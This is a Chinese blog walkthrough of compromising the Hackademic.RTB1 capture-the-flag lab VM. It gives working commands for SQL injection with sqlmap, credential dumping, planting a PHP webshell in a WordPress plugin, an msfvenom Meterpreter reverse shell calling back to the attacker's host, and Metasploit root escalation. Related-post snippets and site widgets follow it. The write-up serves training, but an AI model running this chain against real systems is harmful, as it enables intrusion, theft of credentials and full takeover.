渗透测试——Hackademic.RTB1靶场

最新推荐文章于 2024-09-12 11:28:23 发布
最新推荐文章于 2024-09-12 11:28:23 发布
阅读量281 收藏
点赞数 1
文章标签: 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54950156/article/details/134132449
版权

Kali和靶机都调整为NAT模式

kali上执行以下命令,发现靶机IP:

arp-scan -I eth0 -l

攻击机:192.168.64.131(kali)

靶机:192.168.64.149

对靶机IP扫描全端口,发现只有两个端口,但只有80端口开放

nmap -sS 192.168.64.149 -p 0-65535

通过wappalyzer得知网站的环境信息:

CMS:wordpress

语言解析环境:PHP

数据库:MYSQL

中间件:apache

在页面点击target,页面跳转后,再点击uncategonrized发现疑似存在sql注入点的url:http://192.168.64.149/Hackademic_RTB1/?cat=1

http://192.168.64.149/Hackademic_RTB1/?cat=2 页面内容如下:

目录扫描未发现有用的目录

页面延时5秒,确定存在注入点,数字型,无需闭合符。

http://192.168.64.149/Hackademic_RTB1/?cat=1 and sleep(5)

探测漏洞是否存在

sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1'

探测当前数据库

sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' --current-db

探测表名

sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress --tables

探测列名

sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress -T wp_users --columns

获取用户名

sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress -T wp_users -C user_login --dump

获取密码

sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress -T wp_users -C user_pass --dump

访问后台默认目录wp_admin

http://192.168.64.149/Hackademic_RTB1/wp-admin

使用bp暴力破解,使用户名和密码一一对应

使用GeorgeMiller登录后台,用户权限最高

找到后台的可利用功能点

先用phpinfo测试,将hello.php的内容修改为<?php phpinfo();?>

访问后证明确实可用

修改为一句话木马

用哥斯拉进行连接

http://192.168.64.149/Hackademic_RTB1/wp-content/plugins/hello.php

查看系统内核

Unmae -a

制作linux木马

由于目标系统是32位的linux系统,因此选择payload时要选linux/x86的模块

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.64.131 LPORT=9999 -f elf > /var/www/html/shell.elf

上传木马

执行木马文件

Msf开启监听,获取权限

use exploit/multi/handler

set payload linux/x86/meterpreter_reverse_tcp

set lhost 192.168.64.131

set lport 9999

run

查找提权exp的模块

background

use post/multi/recon/local_exploit_suggester

set session 1

run

第五个模块可用

设置参数,获得会话,权限提升到root

use exploit/linux/local/rds_rds_page_copy_user_priv_esc

set session 1

set lhost 192.168.64.131

run

获得key.txt

cat /root/key.txt

Star Sky1
关注
CTF之Hackademic RTB1 靶机渗透(Wordpress1.5 SQL注入)
afei001
08-22 611
练习环境     攻击机:kali     靶机:Hackademic: RTB1     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
[靶机渗透笔记] HACKADEMIC: RTB1
H4ppyD0g的博客
01-23 2220
靶机链接https://www.vulnhub.com/entry/hackademic-rtb1,17/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.200.129/24 扫描具体信息 sudo nmap 192.168.200.129/24 192.168.200.134开启22和80端口,为靶机的ip地址。 前期扫描 nmap扫描靶机开启的两个端口的版本信息 sudo nmap -p 22,80 -sV 192.168.200.134 针对80端口 nmap默认脚本扫
HACKADMIC-RTB1靶场(打靶流程)
qq_53733257的博客
10-29 467
HACKADMIC-RTB1靶场(打靶流程)
渗透测试靶机---Hackademic.RTB1
久恙502的博客
11-01 202
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Hackademic.RTB1 靶机渗透测试流程
RemedyVI的博客
07-17 360
信息收集知道使用了wordpressCMS,通过SQL注入得到后台登录的users表,登录后台通过主题文件修改得到反弹shell,最后利用系统漏洞提权,总体来说靶机难度很简单。
Hackademic.RTB1
weixin_44770698的博客
12-08 347
靶场练习
渗透测试实战——hackme:1靶机
LRcaho的博客
04-24 3899
靶机地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.28.137 测试机系统:kali、win10 测试机IP:192.168.28.128 目录 一、信息收集 1.主机发现 2.端口扫描 3.服务扫描 4.目录扫描 5.访问目录扫描出的网站 二、漏洞探测 1.查看是否存在sql注入 2.sql注入 3.登录superadmin 三、getshell 1.上传一句话木
CTF之Hackademic RTB2 靶机渗透(万能密码 端口敲门 joomla1.5 SQL注入)
afei001
08-22 876
练习环境     攻击机:kali     靶机:Hackademic: RTB2     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2217
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
机器人学matlab建模实例,中正平和的机器人学笔记——3.几个MATLAB实例
weixin_30416493的博客
03-22 1263
0. 轨迹学机器人学前最想知道的,就是如何把机器人末端执行器平滑地从A点移动到B点,也许不太准确,应当说从位姿A移动到位姿B。0.1 关节空间运动考虑末端执行器在以下两个笛卡尔位姿之间移动下面两种语法都可以表示(x,y,z,θ)的位姿mdl_puma560 %载入提供的puma560机械臂模型T1 = transl(0.4, 0.2, 0) * trotx(pi);%T1 = SE3(0.4, ...
Hackademic.RTB1渗透打靶流程
qq_65580890的博客
10-31 100
nmap -p1-65535 -sV 192.168.142.173(端口和服务)在web服务器上访问这两个端口:80端口。有Hackademic.RTB1渗透。Url中有后面,看看是否是sql注入。
Hackademic.RTB1靶机渗透笔记
m0_72212352的博客
10-31 325
4.点击该连接,进入以下页面,提示目标为根目录的Key.txt,同时出现两个连接,分别访问。发现只有登录GeorgeMiller账号出现文件上传点,设置允许上传文件。查看id,已经提升到root权限,在根目录找到key.txt文件并查看。使用sqlmap进行扫描,出现结果,以此为突破点进行深入扫描。7.知道了可以登录的用户名和密码,要找到可以进行登录的地方。kali接收到反弹shell,并查看系统版本。3.出现web服务,进行访问,存在跳转连接。使用sql进行扫描,结果显示不存在。
Hackademic.RTB1靶场
m0_72012500的博客
11-01 90
输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?
hackademic.RTB1(利用php_reverse_shell)
JyajT的博客
04-23 345
针对vulhub的练习
HackademicRTB1靶机练习
IWANnaaa的博客
11-14 433
HackademicRTB1靶机练习
oscp——Hackademic: RTB1
王嘟嘟的博客
02-22 588
0x00 前言 这是第33台机子啦 0x01 信息收集 0x02 Web80——webshell 访问一下网站,发现一个说明,这个时候一般都是要扫一下目录。 这里找到了一个特别的url,这里测试了一下sql注入 http://192.168.25.207/Hackademic_RTB1/?cat=1 拿到了一些账号密码,使用GeorgeMiller q1w2e3 进行登录 写一个反弹s...
chattr:修改文件的特殊属性
qq_38641599的博客
09-12 877
​chattr​命令用于改变文件的特殊属性,也称为"chattr 属性"。这些属性可以提供额外的安全性和控制,如设置文件为不可修改、只允许在文件末尾添加数据等。‍。
通过TensorBoard查看服务器训练过程
最新发布
记录图像处理中遇到的点点滴滴
09-12 275
在本地查看服务器训练代码过程
运维的基本概念:服务器和网络基础知识
Echo_Wish的博客
09-12 911
服务器和网络是现代IT系统的基础设施,运维工程师需要掌握这些基础知识,才能有效地管理和维护系统。希望本文能够帮助读者更好地理解运维的基本概念,并提供一些实用的服务器和网络管理示例。通过不断学习和实践,运维工程师可以提升自己的技能,为企业的IT系统保驾护航。
rtb10.4.mltbx下载
11-16
rtb10.4.mltbx是一个MATLAB工具箱文件,用于在MATLAB软件中进行实时竞价广告买卖(RTB)相关的数据处理和分析。要下载这个工具箱文件,您可以按照以下步骤操作: 首先,您需要通过互联网连接到MATLAB官方网站或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值